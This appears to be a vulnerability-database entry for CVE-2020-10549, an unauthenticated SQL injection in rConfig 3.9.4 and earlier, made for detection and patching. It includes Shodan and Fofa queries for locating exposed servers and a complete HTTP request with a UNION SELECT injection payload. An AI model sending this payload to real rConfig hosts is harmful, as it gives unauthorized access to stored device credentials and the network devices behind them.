| Title | rConfig <=3.9.4 - SQL Injection |
|---|---|
| Author | madrobot |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. |
| Remediation | Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.92992 |
| CVE ID | CVE-2020-10549 |
| CWE ID | CWE-89 |
| Shodan Query | http.title:"rconfig" |
| Fofa Query | title="rconfig" |
| Tags | cve cve2020 rconfig sqli vuln |
rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes’ passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10549.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-10549.pcap
N/AN/A